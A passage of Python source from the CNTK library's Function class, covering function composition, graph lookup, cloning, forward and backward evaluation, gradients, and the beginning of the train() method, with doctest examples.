# - parallel application would be done by nested Sequential or >> expressions
# - we also need to rethink Sequential() for the case that the first function passed to
# it accepts multiple arguments. That should just become the returned composite's signature.
# It naturally would if we just passed it on to Function, but in case of a tuple, we'd need
# to create intermediate placeholders so that all functions in the tuple get to share the inputs.
def __rshift__(self, other):
'''
Forward function composition (G o F), same as Sequential([F, G]).
Unlike __call__(), __rshift__() accepts tuples:
* `G` can be a tuple of Functions. They are applied in parallel, yielding a tuple result.
If `F` is a single-valued Function, it will be fed to all items.
* if `F` is a tuple-valued Function piped and `G` is a single Function, the tuple
values will be used as the arguments to `G`.
* if both are tuples, they are applied 1:1
E.g. `Embedding(500) >> (Recurrence(500), Recurrence(500, go_backwards=True)) >> splice >> Dense`
'''
inputs = self.outputs
input_is_tuple = len(inputs) > 1
# if piping into a tuple of Functions, apply item-wise
if isinstance(other, tuple):
from cntk import combine
return combine([other[i](inputs[i if input_is_tuple else 0]) for i in range(len(other))])
# if applying a single function to a tuple-valued Function, pass the items as the args
elif input_is_tuple:
return other(*inputs)
# regular case: one input, one Function
else:
return other(self)
def __lshift__(self, other):
'''
Backward function composition (self o other)
'''
return self(other)
def __getattr__(self, name):
'''
Access a member inside this object.
Members of ``Function`` can be accessed directly.
In addition, members of the Function's output, if only one, are accessed here.
Lastly, this also gives access to Functions and Variables inside this Function's
graph by their user-specified name, e.g. ``model.embed.E``, as long as those names are not also
member names of Function or Variable.
'''
# If name is not a member of Function or Variable, first look for
# a user-named item in the graph.
# (Known member names cannot be overridden by user-named items,
# to ensure that the API functions.)
if not hasattr(Variable, name) and not hasattr(Function, name) \
and not name.startswith('_') and name not in ['outputs', 'output', 'this']:
# lookup of a named object inside the graph
# When 'self' is a BlockFunction (e.g. a named layer), then we only search in there,
# while when 'self' is a regular node (e.g. a named output using Label),
# we search the composite, which may return multiple hits with the same name.
# In case of multiple matches, we fail.
# BUGBUG: That is a problem if, e.g., someone used a layer (=BlockFunction) twice
# and then looks it up by name, as that will fail although both instances are identical.
from cntk.logging.graph import find_by_name
root = self.block_root if self.is_block else self
item = typemap(find_by_name)(root, name, depth=1)
if item:
return item
# If something is not found in Function, look it up in its output
# variable, if it has only one.
if name.startswith('_') or name in ['outputs', 'output', 'this']:
# These should not be looked up in self's output.
# 'outputs' and 'output' are required to fetch the attribute for
# in the Variable.
# 'this' is required for Swig and needs to be thrown if the
# object is created the first time.
raise AttributeError("neither Function nor its output variable"
" has '%s'"%name)
# access an API member of 'output', such as .shape()
outputs = self.__getattribute__('outputs')
if len(outputs) != 1:
raise AttributeError("Function does not have '%s' and it cannot "
"be looked up in its outputs because it does not have "
"exactly one"%name)
return getattr(outputs[0], name)
@property
def type(self):
'''
Get type of a Function's output.
'''
return self.output.type
@property
@typemap
def arguments(self):
'''
List of all input variables of the Function that are not of type Parameter or Constant
'''
return super(Function, self).arguments()
@property
@typemap
def attributes(self):
'''
List of the attributes of the function
'''
return sanitize_Function_attributes(super(Function, self).attributes())
def set_attribute(self, name, value):
'''
Allows to change a function attribute.
Args:
name (string): one of
* 'dropoutRate': modifies the dropout rate of a dropout function
(can only be invoked on a function instance returned either from
:func:`~cntk.ops.dropout` or :func:`find_by_name`).
* 'rngSeed': modifies the seed of a stateful function (can only be
invoked on function instance returned from :func:`~cntk.ops.dropout`,
:func:`~cntk.ops.random_sample`,
:func:`~cntk.ops.random_sample_inclusion_frequency` or :func:`find_by_name`)
value (float in case of 'dropoutRate', int for 'rngSeed'): the new value
of the corresponding attribute.
'''
value = _to_cntk_dict_value(value)
return super(Function, self).set_attribute(name, value)
@typemap
def clone(self, method, substitutions=None):
'''
Clones the function. The parameters of the Function are either cloned,
shared or frozen as specified by the method argument and any variable
substitutions requested are applied in the cloned Function instance.
Args:
method (:class:`CloneMethod`): one of
* 'clone': the returned function gets its own copy of parameters (default)
* 'share': the returned function shares its parameters with this function
* 'freeze': parameters are cloned and made immutable (constant).
substitutions (dict): a dictionary mapping variables in this
function to variables in the cloned function
Returns:
:class:`~cntk.ops.functions.Function`: the cloned Function
'''
# C++ clone() can only clone composites. If we are not a composite, make it one using combine()
if not self.is_composite:
from cntk import combine
return combine([self]).clone(method, substitutions)
method = getattr(cntk_py,
'ParameterCloningMethod_' + CloneMethod(method).name.capitalize())
substitutions = substitutions or {}
if not isinstance(substitutions, dict):
raise TypeError("Variable substitution map must be a dictionary")
return super(Function, self).clone(method, substitutions)
@property
@typemap
def constants(self):
'''
List of all `Constant` variables of this :class:`~cntk.ops.functions.Function`
'''
return super(Function, self).constants()
def eval(self, arguments=None, outputs=None, device=None, as_numpy=True):
'''
Evaluate the Function's outputs using the specified ``arguments`` as input.
Args:
arguments: maps variables to their input data. The interpretation depends on
the input type:
* dict: keys are input variable or names, and values are the input data.
See :meth:`~cntk.ops.functions.Function.forward` for details on passing
input data.
* any other type: if node has a unique input, arguments is
mapped to this input.
For nodes with more than one input, only dict is allowed.
In both cases, every sample in the data will be interpreted
as a new sequence.
Sequences can be marked as continuations of the same sequence in
the previous minibatch (that is the sequence in the same slot).
There are two possibilities for this:
* specifying arguments as a `tuple` where the first element is
used as arguments and the second one will be used as a list
of bools, denoting whether a sequence is a new one (`True`) or a
continuation of the sequence in the same slot of the previous
minibatch (`False`). This will be applied to all batches.
* specifying arguments as a dictionary of variables to tuples
where the first element is used as arguments and the second
one will be used as a list of bools, denoting whether a sequence
is a new one (`True`) or a continuation of the sequence in the
same slot of the previous minibatch (`False`). This will be
applied to all batches.
Data should be either NumPy arrays or a
:class:`~cntk.io.MinibatchData` instance.
outputs (iterable, optional): outputs to fetch values for. If not
set, all outputs of the function will be fetched.
device (:class:`~cntk.device.DeviceDescriptor`): the device descriptor that
contains the type and id of the device on which the computation is
to be performed.
as_numpy (bool): whether to return the result as a NumPy array. Default True.
Specifying this as False returns a CNTK Value which avoids a
costly conversion but returns a somewhat opaque object. Also, the Value objects
are temporary and only guaranteed to be valid until the next forward/eval/backward/grad call.
You must explicitly clone the temporay Value objects if they need to be accessed later.
Note:
See :meth:`~cntk.ops.functions.Function.forward` for examples on
passing input data.
Returns:
dict or NumPy Array: Dict with keys of ouput variable names and values of
output variable. A single NumPy array if there is only one output value.
'''
if outputs is None:
outputs = self.outputs
_, output_map = self.forward(arguments, outputs, device=device, as_numpy=as_numpy)
return sanitize_variable_value_dict(output_map)
@typemap
def forward(self, arguments, outputs=None, keep_for_backward=None, device=None, as_numpy=True):
'''
Computes the values of speficied variables in ``outputs``, using values
provided in ``arguments`` that correspond to each input `Variable` of
the function (i.e. those that have ``is_input = True``).
Example:
>>> # Example of passing dense data
>>> v = C.input_variable(shape=(3,))
>>> f = C.reciprocal(v)
>>> _, fv = f.forward({v:[[1, 2, 4]]})
>>> list(fv.values())[0]
array([[ 1. , 0.5 , 0.25]], dtype=float32)
Example:
>>> # Passing sparse values as one-hot with a vocabulary size of 5
>>> vocab_size = 5
>>> v = C.sequence.input_variable(shape=(vocab_size,), is_sparse=True)
>>> f = C.times(v, np.eye(vocab_size))
>>> # Passing a batch of two sequences:
>>> # 1st sequence: word 1
>>> # 2nd sequence: words 2 and 4
>>> batch = [[1],[2,4]]
>>> sparse_batch = C.Value.one_hot(batch, vocab_size)
>>> _, fv = f.forward({v:sparse_batch})
>>> list(fv.values())[0]
[array([[ 0., 1., 0., 0., 0.]], dtype=float32),
array([[ 0., 0., 1., 0., 0.], [ 0., 0., 0., 0., 1.]], dtype=float32)]
Example:
>>> # Doing the same, but with a CSR matrix from scipy.sparse
>>> vocab_size = 5
>>> from scipy.sparse import csr_matrix
>>> v = C.sequence.input_variable(shape=(vocab_size,), is_sparse=True)
>>> f = C.times(v, np.eye(vocab_size))
>>> # Note that csr_matrix automatically uses a sparse representation underneath.
>>> sparse_batch = [csr_matrix([[0,1,0,0,0]]), csr_matrix([[0,0,1,0,0], [0,0,0,0,1]])]
>>> _, fv = f.forward({v:sparse_batch})
>>> list(fv.values())[0]
[array([[ 0., 1., 0., 0., 0.]], dtype=float32),
array([[ 0., 0., 1., 0., 0.], [ 0., 0., 0., 0., 1.]], dtype=float32)]
<BLANKLINE>
>>> # Much more efficient, however, is to incrementally create CSR arrays.
>>> # See https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.csr_matrix.html
>>> # for more information.
>>> def seq_to_csr_matrix(seq, vocab_size):
... indptr = [0]
... indices = []
... data = []
... for term_idx in seq:
... indices.append(term_idx)
... data.append(1)
... indptr.append(len(indices))
... return csr_matrix((data, indices, indptr), shape=(len(seq), vocab_size))
>>> sparse_batch = [seq_to_csr_matrix(seq, vocab_size) for seq in batch]
>>> _, fv = f.forward({v:sparse_batch})
>>> list(fv.values())[0]
[array([[ 0., 1., 0., 0., 0.]], dtype=float32),
array([[ 0., 0., 1., 0., 0.], [ 0., 0., 0., 0., 1.]], dtype=float32)]
Args:
arguments: maps variables to their input data. The interpretation depends on
the input type:
* dict: keys are input variable or names, and values are the
input data. To specify a minibatch, provide a list of arrays.
The shape of each array must be compatible with the shape of
the dictionary key. If the array denotes a sequence then the
elements of the sequence are grouped along axis 0.
* any other type: if node has a unique input, arguments is
mapped to this input.
For nodes with more than one input, only dict is allowed.
In both cases, every sample in the data will be interpreted
as a new sequence.
Sequences can be marked as continuations of the same sequence in
the previous minibatch (that is the sequence in the same slot).
There are two possibilities for this:
* specifying arguments as a `tuple` where the first element is
used as arguments and the second one will be used as a list
of bools, denoting whether a sequence is a new one (`True`) or a
continuation of the sequence in the same slot of the previous
minibatch (`False`). This will be applied to all batches.
* specifying arguments as a dictionary of variables to tuples
where the first element is used as arguments and the second
one will be used as a list of bools, denoting whether a sequence
is a new one (`True`) or a continuation of the sequence in the
same slot of the previous minibatch (`False`). This will be
applied to all batches.
Data should be either NumPy arrays or a
:class:`~cntk.io.MinibatchData` instance.
outputs (iterable, optional): outputs to fetch values for. If not
set, all outputs of the function will be fetched.
keep_for_backward (set, default `None`): the subset of the
Function's output variables for which gradients shall be calculated
in a subsequent backward call. If `None`, the returned state will
be `None` and a subsequent call to :func:`backward` will not be
possible.
device (:class:`~cntk.device.DeviceDescriptor`, default `None`): the device
descriptor that contains the type and id of the device on which the
computation is. If `None`, the default device is used.
as_numpy (bool): whether to return the result as a NumPy array. Default True.
Specifying this as False returns a CNTK Value which avoids a
costly conversion but returns a somewhat opaque object. Also, the Value objects
are temporary and only guaranteed to be valid until the next forward/eval/backward/grad call.
You must explicitly clone the temporay Value objects if they need to be accessed later.
Returns:
A tuple (BackPropState, map of outputs to NumPy arrays). The
BackPropState is a handle taken by :func:`backward`.
'''
if device is None:
device = DeviceDescriptor.use_default_device()
in_var_map = sanitize_var_map(self.arguments, arguments,
None, device)
if outputs is None:
outputs = self.outputs
else:
outputs = sanitize_variables_or_functions(outputs)
output_map = {v: None for v in outputs}
keep_for_backward = set(keep_for_backward or {})
state = super(Function, self)._forward(in_var_map, output_map, device,
keep_for_backward)
if as_numpy:
for k, v in output_map.items():
output_map[k] = _value_as_sequence_or_array(v, k)
return state, output_map
@typemap
def backward(self, state, root_gradients, variables, as_numpy=True):
'''
Backpropagates supplied ``root_gradients`` for one or more of the output
variables of the Function, to calculate gradients with respect to
``variables``. Formally, multiplies the values of ``root_gradients`` by
the Jacobian of the Function and returns the subset of the output that
corresponds to ``variables``.
Example:
>>> # compute the value and the derivative of the sigmoid at 0
>>> v = C.input_variable(shape=(1,), needs_gradient=True)
>>> f = C.sigmoid(v)
>>> df, fv = f.forward({v:[[0]]}, [f.output], set([f.output]))
>>> value = list(fv.values())[0]
>>> grad = f.backward(df, {f.output: np.ones_like(value)}, set([v]))
>>> value
array([[ 0.5]], dtype=float32)
>>> list(grad.values())[0]
array([[ 0.25]], dtype=float32)
Args:
state (BackPropState): state obtained from a previous call to the
func:`cntk.ops.Function.forward` method on this Function for the
computation that this gradient backpropagation corresponds to.
root_gradients (dict): the gradients that will be backpropagated
variables (set): a list of input variables with respect to which
the gradients have to be computed.
as_numpy (bool): whether to return the gradients as a NumPy array. Default True.
Specifying this as False returns a CNTK Value which avoids a
costly conversion but returns a somewhat opaque object. Also, the Value objects
are temporary and only guaranteed to be valid until the next forward/eval/backward/grad call.
You must explicitly clone the temporay Value objects if they need to be accessed later.
Note:
See :meth:`~cntk.ops.functions.Function.forward` for more examples
on passing input data.
Returns:
dict: mapping of ``variables`` to NumPy arrays
'''
if state is None:
raise ValueError('You are attempting to backpropagate on a '
'minibatch for which the corresponding forward operation did not '
'keep any intermediate results, Please set keep_for_backward in '
'forward to the variables in root_gradients.keys()')
device = state.device()
root_gradients = sanitize_var_map(self.outputs, root_gradients,
None, device)
var_gradients = {var: None for var in variables}
self._backward(state, root_gradients, var_gradients)
if as_numpy:
for var, value in var_gradients.items():
var_gradients[var] = _value_as_sequence_or_array(value, var)
return var_gradients
@typemap
def grad(self, at, wrt=None, outputs=None, device=None, as_numpy=True, grad_root=None):
'''
Computes the gradient of this Function at location ``at`` with respect to ``wrt``.
The Function must have a single output.
Example:
>>> x = C.input_variable(shape=(1,), needs_gradient=True)
>>> y = C.sqrt(x)
>>> a = np.asarray([1,4,16],dtype=np.float32).reshape(3,1)
>>> y.grad({x:a})
array([[ 0.5 ],
<BLANKLINE>
[ 0.25 ],
<BLANKLINE>
[ 0.125]], dtype=float32)
Args:
at (dict) : mapping of the Function's arguments to values
wrt (list, default `None`): list of Variables with respect to which the
gradient will be computed. If omitted, the gradients with
respect to all arguments of this Function that need gradient will be computed.
outputs (iterable, optional): outputs (including intermediate outputs in the graph)
to fetch values for. If not specified, values for none of the outputs are fetched.
device (:class:`~cntk.device.DeviceDescriptor`, default `None`): the device
descriptor that contains the type and id of the device on which the
computation is performed. If `None`, the default device is used.
as_numpy (bool, default `True`): whether to return the gradients as a NumPy array. Default True.
Specifying this as False returns a CNTK Value which avoids a
costly conversion but returns a somewhat opaque object. Also, the Value objects
are temporary and only guaranteed to be valid until the next forward/eval/backward/grad call.
You must explicitly clone the temporay Value objects if they need to be accessed later.
grad_root (:class:`~cntk.variables.Variable`, optional): specify the root of gradients calculation.
If not specified, the output of this function will be used as gradient root.
Returns:
dict or NumPy Array or a tuple of these: Dict with keys of ``wrt`` variables and gradient values of
``wrt`` variables. A single NumPy array if there is only one gradient value.
If ``outputs`` were specified (to fetch values for), this method returns a tuple where the 2nd element
of the tuple is the ``outputs`` values; a dict with keys of specified ``outputs`` variables and
values of computed ``outputs``, or a single NumPy array if there is only one output value.
Each element has the same shape as the ``wrt`` or ``outputs`` variables including dynamic axes
(such as the batch axis).
'''
if device is None:
device = DeviceDescriptor.use_default_device()
in_var_map = sanitize_var_map(self.arguments, at, None, device)
if outputs is None:
outputs = []
if wrt is None:
wrt = [arg for arg in self.arguments if arg.needs_gradient]
if len(wrt) == 0:
raise ValueError("None of the Function '%s' arguments have 'needs_gradient == True'" % str(self))
output_map = {v: None for v in outputs}
wrt_map = {v: None for v in wrt}
if grad_root is None:
super(Function, self).gradients(in_var_map, wrt_map, output_map, device)
else:
super(Function, self).gradients(in_var_map, grad_root, wrt_map, output_map, device)
if as_numpy:
for k in output_map:
output_map[k] = _value_as_sequence_or_array(output_map[k], k)
for k in wrt_map:
wrt_map[k] = _value_as_sequence_or_array(wrt_map[k], k)
if len(output_map) == 0:
return sanitize_variable_value_dict(wrt_map)
else:
return sanitize_variable_value_dict(wrt_map), sanitize_variable_value_dict(output_map)
@property
@typemap
def inputs(self):
'''
List of variables that are inputs of this function.
Note that 'inputs' here denotes all Variables that feed into this Function
including any Parameter/Constant Variables that are children of this Function.
'''
return super(Function, self).inputs(True)
@property
def name(self):
'''
Name of this function
Args:
getter (str): returns the name of the function.
setter (str): sets the name of the function. Setting the name of a
Function is only allowed if the Function does not already have a
name. Calling this method, when this Function already has a name,
results in an exception.
'''
return super(Function, self).name()
@name.setter
def name(self, function_name):
super(Function, self).set_name(function_name)
@property
def op_name(self):
'''
Name of the operation that this Function performs
'''
return super(Function, self).op_name()
@property
@typemap
def output(self):
'''
The single output variable if there is only one, or raises an exception.
'''
return super(Function, self).output()
@property
@typemap
def outputs(self):
'''
List consisting of all output variables of this function.
'''
return super(Function, self).outputs()
@property
@typemap
def parameters(self):
'''
List of all parameter variables of this function.
'''
return super(Function, self).parameters()
@property
@typemap
def placeholders(self):
'''
List of all placeholders variables of this function.
'''
return super(Function, self).placeholders()
@property
@typemap
def root_function(self):
'''
The primitive function at the root of the graph of functions underlying this function.
'''
return super(Function, self).root_function()
@property
def is_primitive(self):
'''
Returns a boolean indicating if this Function is a primitive Function.
A primitive Function is the lowest level building block for composite Function
graphs and is either a CNTK built-in operator, a composite Function encapsulated
as a Block or a user-defined Function
'''
return super(Function, self).is_primitive()
@property
def is_composite(self):
'''
Returns a boolean indicating if this Function is a composite Function.
A composite Function is a Function that is composed of primitive Functions.
'''
return super(Function, self).is_composite()
@property
def is_block(self):
'''
Returns a boolean indicating if this Function is a block function which is basically
a composite encapsulated as an opaque block which appears as a primitive during
traversing the graph of Functions that this block is part of.
'''
return super(Function, self).is_block()
@property
@typemap
def block_root(self):
'''
Returns the root of the Function graph underlying this block Function.
Throws an exception if this is not a block Function.
'''
return super(Function, self).block_root()
@property
@typemap
def block_arguments_mapping(self):
'''
Returns the mapping from the arguments of the composite underlying this block function
to the Variables that they are bound to in the outer graph of Functions that this
block Function is part of.
'''
return super(Function, self).block_arguments_mapping()
@property
@typemap
def uid(self):
'''
The internally generated unique name of the function.
'''
return super(Function, self).uid()
def __str__(self):
'''
Describes the Function and its signature as a string.
Example:
>>> f = C.log(C.input(1), name='f') # Function constructed as a graph
>>> print(f)
f: Log(Tensor[1]) -> Tensor[1]
>>> d = C.layers.Dense(10) # Function constructed as a layer
>>> print(d)
Dense(x: Sequence[tensor]) -> Sequence[tensor]
>>> @C.Function # construct a primitive Function through @Function
... def g(x,y):
... return x+y
>>> print(g)
Plus(x: Sequence[tensor], y: Sequence[tensor]) -> Sequence[tensor]
>>> @C.Function # construct a composite through @Function
... def h(x,y):
... return C.exp(x+y)
>>> print(h)
Composite(x: Sequence[tensor], y: Sequence[tensor]) -> Sequence[tensor]
'''
f_name = self.name
op_name = self.op_name
if self.is_composite:
if self.root_function and all(i.uid == ri.uid for i, ri in zip(self.inputs, self.root_function.inputs)):
op_name = self.root_function.op_name
else:
op_name = 'Composite' # (real op_name is CompositeFunctionOpName)
else:
op_name = self.op_name
args = self.signature
def format_arg_spec(v, is_output=False):
s = v.name + ': ' if not is_output and v.name else '' # (suppress output names, since they duplicate the function name)
return s + str(v._type)
outputs = self.outputs
if len(outputs) > 1:
output_signature = 'Tuple[' + ', '.join(format_arg_spec(output, True) for output in outputs) + ']'
else:
output_signature = format_arg_spec(outputs[0], True)
if self.name:
f_name += ": "
return f_name + op_name + '(' + ", ".join([format_arg_spec(param) for param in args]) + ') -> ' + output_signature
@typemap
def replace_placeholders(self, substitutions):
'''
In-place replace specified placeholders in the Function graph with the
specified replacements in the map.
Args:
substitutions (dict): map from placeholder to variables
Returns:
:class:`Function`: itself
'''
substitutions = substitutions or {}
if not isinstance(substitutions, dict):
raise TypeError("Variable substitution map must be a dictionary")
return super(Function, self).replace_placeholders(substitutions)
@typemap
def replace_placeholder(self, substitution):
'''
In-place replace the only placeholder in the function graph with the
specified substitution.
Args:
substitution (:class:`~cntk.variables.Variable`): the variable
that will replace the placeholder
Returns:
:class:`Function`: itself
:raises Exception: when the function has multiple placeholders.
'''
return super(Function, self).replace_placeholder(substitution)
@typemap
def find_all_with_name(self, name, depth=0):
'''
Returns a list of primitive function with ``name`` in the graph
starting from this node. Throws an exception if ``name`` occurs
multiple times. If you expect only one function to be returned, use
:func:`find_by_name`.
Example:
>>> a = C.input_variable(shape=1, name='i')
>>> b = C.input_variable(shape=1, name='i')
>>> c = C.plus(a, b, name='c')
>>> len(c.find_all_with_name('i'))
2
>>> c.find_all_with_name('z')
[]
Args:
name (str): names to look for
depth (int, default 0): how deep into the block hierarchy the DFS
algorithm should go into. Set to -1 for infinite depth.
Returns:
list of :class:`Function` objects matching ``name``
See also:
:func:`find_by_name`
'''
from cntk.logging import graph
return graph.find_all_with_name(self, name, depth)
# TODO have a better name for combine() in this case
@typemap
def find_by_name(self, name, depth=0):
'''
Returns a primitive function with ``name`` in the graph starting from
this node. Throws an exception if ``name`` occurs multiple times. If
you expect multiple functions to be returned, use
:func:`find_all_with_name`.
Example:
>>> a = C.input_variable(shape=1, name='a')
>>> b = C.input_variable(shape=1, name='b')
>>> c = C.plus(a, b, name='c')
>>> print(c.find_by_name('b').name)
b
>>> c.find_by_name('z') is None
True
If you need a full function out of it that can be evaluated, you
need to upcast it (currently done via combine):
>>> d = c * 5
>>> C.combine([d.find_by_name('c')]).eval({a:[[1]], b:[[2]]})
array([[ 3.]], dtype=float32)
Args:
name (str): names to look for
depth (int, default 0): how deep into the block hierarchy the DFS
algorithm should go into. Set to -1 for infinite depth.
Returns:
:class:`Function` object matching ``name``
See also:
:func:`find_all_with_name`
'''
from cntk.logging import graph
return graph.find_by_name(self, name, depth)
class _ProgressCollector(cntk_py.ProgressWriter):
'''
Internal helper for tracking loss and metric values for train() and test().
'''
# TODO: If this is of general interest, consider to move it to progress_print.py
def __init__(self, progress_writers=None, summary_period=None):
self.training_updates = []
self.training_summaries = []
self.test_summaries = []
coll_period = progress_writers[0].freq if (progress_writers and progress_writers[0]) else \
summary_period if summary_period is not None else \
sys.maxsize
super(Function._ProgressCollector, self).__init__(coll_period, 0, sys.maxsize, 0, sys.maxsize, 0)
self.__disown__()
def on_write_training_update(self, samples, updates, aggregate_loss, aggregate_metric):
aggregate_loss = aggregate_loss[1] - aggregate_loss[0]
aggregate_metric = aggregate_metric[1] - aggregate_metric[0]
samples = samples[1] - samples[0]
aggregate_loss /= (samples if samples != 0 else 1)
aggregate_metric /= (samples if samples != 0 else 1)
self.training_updates.append(Record(loss=aggregate_loss, metric=aggregate_metric, samples=samples))
def on_write_test_update(self, *args, **kwargs):
pass
def on_write_training_summary(self, samples, updates, summaries, aggregate_loss, aggregate_metric, elapsed_milliseconds):
aggregate_loss /= (samples if samples != 0 else 1)
aggregate_metric /= (samples if samples != 0 else 1)
self.training_summaries.append(Record(loss=aggregate_loss, metric=aggregate_metric, samples=samples))
def on_write_test_summary(self, samples, updates, summaries, aggregate_metric, elapsed_milliseconds):
aggregate_metric /= (samples if samples != 0 else 1)
self.test_summaries.append(Record(metric=aggregate_metric, samples=samples))
def write(self, *args, **kwargs):
pass
def train(self, minibatch_source,
minibatch_size=32, streams=None, model_inputs_to_streams=None, parameter_learners=[],
callbacks=[], progress_frequency=None, max_epochs=None, epoch_size=None, max_samples=None):
'''
Trains a model, given by its criterion function, using the specified training parameters and configs.
Different aspects of training such as data sources, checkpointing, cross validation, progress printing
can be configured using the corresponding config classes.
The input data can be specified as a data reader (:class:`~cntk.io.MinibatchSource`)
for large corpora; or directly as numpy/scipy arrays if the data is so small that it
is feasible to keep it all in RAM.
Data is processed in minibatches. The minibatch size defaults to 32, which is a choice that commonly works well.
However, for maximum efficiency, we recommend to experiment with minibatch sizes
and choose the largest that converges well and does not exceed the GPU RAM.
This is particularly important for distributed training, where
often, the minibatch size can be increased throughout the training, which reduces data bandwidth
and thus speeds up parallel training.
If input data is given through a data reader (as opposed to directly as a numpy/scipy array),
the user must also specify the epoch size. This is because data readers are used for
large corpora, and the traditional definition of epoch size as number of samples in the corpus
is not very relevant. Instead, CNTK really means the number of samples
between summary actions, such as printing training progress, adjusting the learning rate, and/or checkpointing the model.
The function returns an object that contains these members: `epoch_summaries` is a list that
contains the progression of epoch loss (`.loss`) and metric (`.metric`) values and the corresponding
number of labels (`.samples`) that they were averaged over. This is the same value that a progress printer would print as epoch
summaries. `updates` is a similar list with the more fine-grained minibatch updates.
If a `TestConfig` was specified, then `test_summary` is the metric and sample count on the specified test set
for the final model.
A number of callback mechanisms can optionally be specified as a list as `callbacks`.
CNTK has a fixed set of callback types, and only those types are allowed in the `callbacks` list:
An object of type :class:`~cntk.cntk_py.ProgressWriter` from :mod:`cntk.logging` is used for progress logging;
a :class:`~cntk.train.training_session.CheckpointConfig` configures the checkpointing mechanism, which
keeps copies of models at regular intervals and allows to seamlessly restart from a last checkpoint;
a :class:`~cntk.train.training_session.TestConfig` allows to specify a test set that is evaluated at the end of the training;
and a :class:`~cntk.train.training_session.CrossValidationConfig` specifies a user callback that can be used to adjust learning
hyper-parameters or to denote to stop training, optionally based on a separate cross-validation data set.
This is a convenience wrapper around :class:`cntk.train.trainer.Trainer` :class:`cntk.train.training_session.TrainingSession`.
Args:
self: the criterion function of a model to be trained. This is either a single-valued function (the loss)
or a tuple-valued function (loss and metric).
minibatch_source (:class:`~cntk.io.MinibatchSource` or tuple of numpy/scripy arrays):
data source used for training. For large data, use a MinibatchSource. For small data, pass a tuple of numpy/scipy arrays.
The number of streams/arrays must match the number of arguments of `self`.
streams (tuple): (only if minibatch_source is a data reader) the streams of the minibatch_source in argument order.
Not to be given if minibatch_source is specified as numpy/scipy arrays rather than a data reader.
minibatch_size (int or :class:`~cntk.cntk_py.minibatch_size_schedule`, defaults to 32): minibatch size (or schedule) for training
epoch_size (int): in CNTK, epoch size means the number of samples between outputting summary information and/or checkpointing.
This must be specified unless the user directly passes numpy/scipy arrays for the `minibatch_source`.
max_epochs (int, defaults to 1): maximum number of samples used for training; requires `epoch_size`
parameter_learners (list): list of learners from :mod:`cntk.learners`
callbacks (list): list of callback objects, which can be of type
:class:`~cntk.cntk_py.ProgressWriter` from :mod:`cntk.logging` (for logging),
:class:`~cntk.train.training_session.CheckpointConfig` (for check-pointing),
:class:`~cntk.train.training_session.TestConfig` (for automatic final evaluation on a test set), and
:class:`~cntk.train.training_session.CrossValidationConfig` (for cross-validation based training control).
Except for progress writers, at most one of each is allowed.
model_inputs_to_streams (dict): alternative to `streams`, specifying the mapping as a map from input variables to streams
max_samples (int): maximum number of samples used for training; mutually exclusive with `max_epochs`
progress_frequency (int): frequency in samples for aggregated progress printing. Defaults to `epoch_size` if given, or `None` otherwise
Example:
>>> # a simple logistic-regression model
>>> N = 250
>>> np.random.seed(0)
>>> Y = np.random.randint(size=N, low=0, high=2) # labels
>>> X = (np.random.randn(N, 2)+3) * (Y[:,None]+1) # data
>>> # Our model expects float32 features, and cross-entropy expects one-hot encoded labels.
>>> import scipy.sparse
>>> Y = scipy.sparse.csr_matrix((np.ones(N,np.float32), (range(N), Y)), shape=(N, 2))
>>> X = X.astype(np.float32)
>>> model = cntk.layers.Dense(2, activation=None) # model function
>>> import cntk.layers
>>> @cntk.Function.with_signature(cntk.layers.Tensor[2], cntk.layers.SparseTensor[2]) # criterion function
... def criterion(data, label_one_hot):
... z = model(data) # apply model. Computes a non-normalized log probability for every output class.
... return cntk.cross_entropy_with_softmax(z, label_one_hot)
>>> learner = cntk.sgd(model.parameters, cntk.learning_rate_schedule(0.1, cntk.UnitType.minibatch))
>>> progress = criterion.train((X, Y), minibatch_size=25, max_epochs=2, epoch_size=125, parameter_learners=[learner])
>>> print("%.2f" % progress.epoch_summaries[-1].loss) # get the final epoch's loss value
0.76
Returns:
An object `progress` with `progress.epoch_summaries` and `progress.updates` being the progressions of av loss, av metric, and number of labels
for epochs and updates (groups of minibatches), respectively. If a `TestConfig` was given, then `progress.test_summary`
includes the result (.metric and .samples)
'''
if minibatch_size is None:
raise ValueError("minibatch_size must not be None.")
elif isinstance(minibatch_size, int): # convert to a schedule
from ..train.training_session import minibatch_size_schedule
minibatch_size = minibatch_size_schedule(minibatch_size)
elif not isinstance(minibatch_size, cntk_py.minibatch_size_schedule):
raise ValueError('minibatch_size must be an int or the result an call to the minibatch_size_schedule() function')
# max_samples
# Can be either directly specified as max_samples or indirectly as (max_epochs, epoch_size).
if max_samples is None:
# derive from (max_epochs, epoch_size)
if epoch_size is None:
from ..io import MinibatchSource, UserMinibatchSource
if isinstance(minibatch_source, (MinibatchSource, UserMinibatchSource)): # UserMinibatchSource derives from cntk_py.SwigMinibatchSource, not MinibatchSource, for director purposes
raise ValueError("epoch_size must be specified, unless max_samples is given or input is given as numpy/scipy arrays.")
first_input = _as_tuple(minibatch_source)[0]
try:
epoch_size = len(first_input)
except:
epoch_size = first_input.shape[0] # if input is csr_matrix
if max_epochs is None:
max_epochs = 1 # default to 1 epoch
max_samples = int(max_epochs * epoch_size) # (we allow fractional epochs so our testing system can run abbreviated tests)
elif max_epochs is not None:
raise ValueError("max_epochs and max_samples are mutually exclusive.")
# parse callbacks list into the 4 different parameters that training_session expects
from ..train.training_session import training_session, CheckpointConfig, CrossValidationConfig, TestConfig
from ..cntk_py import ProgressWriter
configs = Record(progress_writers=[], checkpoint_configs=[None], cv_configs=[None], test_configs=[None])
types_to_configs = {
ProgressWriter: configs.progress_writers,
CheckpointConfig: configs.checkpoint_configs,
CrossValidationConfig: configs.cv_configs,
TestConfig: configs.test_configs
}
for cb in callbacks: # separate the callbacks list into one of 4 separate types
for type, config in types_to_configs.items():
if isinstance(cb, type):
if isinstance(cb, cntk.cntk_py.ProgressWriter): # multiple progress writers are allowed
config.append(cb)
elif config[0]:
ValueError('only one callback of type ' + str(type) + ' is permitted')
else:
config[0] = cb
else:
ValueError('callbacks list can only contain objects of type ProgressWriter, CheckpointConfig, CrossValidationConfig, and TestConfig.')
# use a progress tracker to capture the loss, metric, and count values
if progress_frequency is None and epoch_size is not None: # if epoch size is given then default training summary frequency to it
progress_frequency = epoch_size
collector = Function._ProgressCollector(configs.progress_writers, progress_frequency // minibatch_size[0] if progress_frequency is not None else None)
# Trainer instance
from ..train.trainer import Trainer
trainer = Trainer(None, self, parameter_learners, progress_writers=configs.progress_writers + [collector])
# input map
if streams:
if model_inputs_to_streams:
raise ValueError("streams and model_inputs_to_streams are mutually exclusive.")
